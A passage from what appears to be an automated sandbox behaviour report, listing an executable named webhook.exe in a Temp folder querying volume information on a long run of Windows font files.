Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
